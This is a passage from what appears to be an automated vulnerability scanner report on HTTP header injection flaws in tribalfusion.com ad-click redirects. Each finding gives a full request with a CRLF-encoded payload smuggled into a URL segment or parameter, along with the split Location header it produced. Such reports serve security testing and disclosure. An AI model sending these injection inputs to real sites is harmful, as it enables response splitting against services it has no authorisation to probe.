Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=[...]; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:31 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/f3ce9
e73052eb8f6
/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.99. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 9 is copied into the Location response header. The payload f5d0b%0d%0a1a3f5dc4f2b was submitted in the REST URL parameter 9. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/f5d0b%0d%0a1a3f5dc4f2b/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=[...];

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=[...]; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:45 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/f5d0b
1a3f5dc4f2b
/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.100. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of the http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr request parameter is copied into the Location response header. The payload 71cde%0d%0a25f834d5cf9 was submitted in the http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr=71cde%0d%0a25f834d5cf9 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=[...];

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=[...]; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:00 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr=71cde
25f834d5cf9

Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.101. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 371c1%0d%0a2b1e54be015 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?371c1%0d%0a2b1e54be015=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=[...];

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=[...]; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:04 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?371c1
2b1e54be015
=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.102. http://a.tribalfusion.com/h.click/afmM7iPPQoUdMVUrb03F2nVaYqWEB7STJZcRcbJRr6qRWUbWGbQ4rTuoWqq0qmv4WQBQVvZd2AQHotisUtF70bnkYFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r38TW7TomUJmcQnmHfoogm1wx/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/afmM7iPPQoUdMVUrb03F2nVaYqWEB7STJZcRcbJRr6qRWUbWGbQ4rTuoWqq0qmv4WQBQVvZd2AQHotisUtF70bnkYFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r38TW7TomUJmcQnmHfoogm1wx/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload d8fab%0d%0a8e4140adc6 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/afmM7iPPQoUdMVUrb03F2nVaYqWEB7STJZcRcbJRr6qRWUbWGbQ4rTuoWqq0qmv4WQBQVvZd2AQHotisUtF70bnkYFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r38TW7TomUJmcQnmHfoogm1wx/?d8fab%0d%0a8e4140adc6=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Location: ?d8fab
8e4140adc6
=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.103. http://a.tribalfusion.com/h.click/afmM7iPPQoUdMVUrb03F2nVaYqWEB7STJZcRcbJRr6qRWUbWGbQ4rTuoWqq0qmv4WQBQVvZd2AQHotisUtF70bnkYFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r38TW7TomUJmcQnmHfoogm1wx/http:/www.reachout.com/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/afmM7iPPQoUdMVUrb03F2nVaYqWEB7STJZcRcbJRr6qRWUbWGbQ4rTuoWqq0qmv4WQBQVvZd2AQHotisUtF70bnkYFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r38TW7TomUJmcQnmHfoogm1wx/http:/www.reachout.com/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload a4cac%0d%0a09ac87d2afa was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /h.click/afmM7iPPQoUdMVUrb03F2nVaYqWEB7STJZcRcbJRr6qRWUbWGbQ4rTuoWqq0qmv4WQBQVvZd2AQHotisUtF70bnkYFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r38TW7TomUJmcQnmHfoogm1wx/a4cac%0d%0a09ac87d2afa/www.reachout.com/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Location: a4cac
09ac87d2afa
/www.reachout.com/
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.104. http://a.tribalfusion.com/h.click/afmM7iPPQoUdMVUrb03F2nVaYqWEB7STJZcRcbJRr6qRWUbWGbQ4rTuoWqq0qmv4WQBQVvZd2AQHotisUtF70bnkYFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r38TW7TomUJmcQnmHfoogm1wx/http:/www.reachout.com/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/afmM7iPPQoUdMVUrb03F2nVaYqWEB7STJZcRcbJRr6qRWUbWGbQ4rTuoWqq0qmv4WQBQVvZd2AQHotisUtF70bnkYFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r38TW7TomUJmcQnmHfoogm1wx/http:/www.reachout.com/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload cd2cc%0d%0aaa4ca5c4189 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /h.click/afmM7iPPQoUdMVUrb03F2nVaYqWEB7STJZcRcbJRr6qRWUbWGbQ4rTuoWqq0qmv4WQBQVvZd2AQHotisUtF70bnkYFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r38TW7TomUJmcQnmHfoogm1wx/http:/cd2cc%0d%0aaa4ca5c4189/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Location: http:/cd2cc
aa4ca5c4189
/
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.105. http://a.tribalfusion.com/h.click/afmM7iPPQoUdMVUrb03F2nVaYqWEB7STJZcRcbJRr6qRWUbWGbQ4rTuoWqq0qmv4WQBQVvZd2AQHotisUtF70bnkYFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r38TW7TomUJmcQnmHfoogm1wx/http:/www.reachout.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/afmM7iPPQoUdMVUrb03F2nVaYqWEB7STJZcRcbJRr6qRWUbWGbQ4rTuoWqq0qmv4WQBQVvZd2AQHotisUtF70bnkYFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r38TW7TomUJmcQnmHfoogm1wx/http:/www.reachout.com/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 2ddfe%0d%0a0901c3be52f was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/afmM7iPPQoUdMVUrb03F2nVaYqWEB7STJZcRcbJRr6qRWUbWGbQ4rTuoWqq0qmv4WQBQVvZd2AQHotisUtF70bnkYFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r38TW7TomUJmcQnmHfoogm1wx/http:/www.reachout.com/?2ddfe%0d%0a0901c3be52f=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Location: http:/www.reachout.com/?2ddfe
0901c3be52f
=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.106. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload f5a19%0d%0afc20db3ebd2 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/?f5a19%0d%0afc20db3ebd2=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=a3nh31M0iHHBE0uBQoKI56mjOlRsDVgC7iBgKy9FUgXjmYY9O9kaFh8SOkZaj3tSZbfqZctTGSNPPPZcmwxRy1ftAjr7WIr74noBDakkG1ZaL0XThVHteULITvf1GEPrUjCj5srmTHwAw20yvnOvqwn9FBwh9rkhlX3AiepVYXQH9jCImMT56vNvZaSsEL04gLZdEFjVJgPG3kZaUnVjAagwn9aJlyok54ruHRc8TyMii3ds4VNsmLgtJNPZaq4Ya0Dr5TtlAmRJaMeP6LMsCPMB4Zbd4IiuB3aZa8BA7PHatkU5g9v7Pp5HUBYsTZa8UoKvwTVtFFmvmR3tJ0EAtrKtpsLxhZa3uwh3k5uZbvJ06cnFcN4JMgQViaJd38KAUkZctI3ZbqBGjgSAr6sQwwHtypeJMcAF8hXNWmQBrmjIiQ7k8S9PothRuWnJ1ZaaDiSZcfMvOZcg4D17uMOZcdTYCxDqlZarXkZb05ZcfrFFgNPFmKG; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:24:18 GMT;
Content-Type: text/html
Location: ?f5a19
fc20db3ebd2
=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.107. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/ [ord parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/

Issue detail

The value of the ord request parameter is copied into the Location response header. The payload 378e3%0d%0ac81c5b2e403 was submitted in the ord parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/;ord=378e3%0d%0ac81c5b2e403 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
